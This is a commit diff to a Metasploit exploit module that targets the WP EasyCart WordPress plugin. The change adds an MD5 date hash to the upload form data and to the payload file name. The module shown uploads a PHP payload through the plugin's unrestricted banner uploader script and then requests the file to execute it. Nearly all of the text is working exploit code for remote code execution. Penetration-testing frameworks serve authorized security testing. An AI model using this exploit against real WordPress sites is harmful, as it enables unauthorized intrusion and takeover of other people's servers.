Add a date hash to the post data

rastating · rastating · commit e6f6acece9be · 2015-01-12T21:21:50.000Z
diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'digest/md5'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -64,9 +65,9 @@ def check
     check_plugin_version_from_readme('wp-easycart', '3.0.5')
   end
 
-  def generate_mime_message(payload, name)
+  def generate_mime_message(payload, date_hash, name)
     data = Rex::MIME::Message.new
-    data.add_part('1', nil, nil, 'form-data; name="datemd5"')
+    data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
     data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
     data
   end
@@ -79,10 +80,11 @@ def exploit
 
     print_status("#{peer} - Preparing payload...")
     payload_name = Rex::Text.rand_text_alpha(10)
+    date_hash = Digest::MD5.hexdigest(Time.now.to_s)
     plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
     uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
-    payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_1.php")
-    data = generate_mime_message(payload, "#{payload_name}.php")
+    payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php")
+    data = generate_mime_message(payload, date_hash, "#{payload_name}.php")
 
     print_status("#{peer} - Uploading payload to #{payload_url}")
     res = send_request_cgi(
@@ -98,7 +100,7 @@ def exploit
     print_good("#{peer} - Uploaded the payload")
 
     print_status("#{peer} - Executing the payload...")
-    register_files_for_cleanup("#{payload_name}_1.php")
+    register_files_for_cleanup("#{payload_name}_#{date_hash}.php")
     send_request_cgi(
     {
       'uri'     => payload_url,
